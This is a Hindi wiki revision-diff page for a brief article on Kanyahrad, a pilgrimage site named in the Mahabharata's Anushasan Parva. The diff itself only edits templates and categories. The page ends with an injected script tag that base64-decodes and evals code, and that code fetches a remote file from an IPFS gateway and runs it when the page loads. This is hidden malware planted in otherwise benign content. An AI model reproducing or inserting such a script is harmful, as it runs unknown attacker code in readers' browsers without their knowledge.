Difference between revisions of "कन्याह्रद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:महाभारत (को हटा दिया गया हैं।))
 
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
[[अनुशासन पर्व महाभारत|महाभारत अनुशासन पर्व]] के अन्तर्गत तीर्थों के प्रसंग में कन्याह्रद का उल्लेख है। कन्याह्रद [[कन्यतीर्थ]] ([[कान्यकुब्ज]]) का ही नाम है।  
 
[[अनुशासन पर्व महाभारत|महाभारत अनुशासन पर्व]] के अन्तर्गत तीर्थों के प्रसंग में कन्याह्रद का उल्लेख है। कन्याह्रद [[कन्यतीर्थ]] ([[कान्यकुब्ज]]) का ही नाम है।  
{{प्रचार}}
+
 
{{संदर्भ ग्रंथ}}
+
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
+
==संबंधित लेख==
 +
{{महाभारत}}
  
==संबंधित लेख==
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:नया पन्ना]]
 
 
[[Category:महाभारत]]
 
[[Category:महाभारत]]
 +
[[Category:पौराणिक कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 09:05, 21 October 2014

mahabharat anushasan parv ke antargat tirthoan ke prasang mean kanyahrad ka ullekh hai. kanyahrad kanyatirth (kanyakubj) ka hi nam hai.


tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>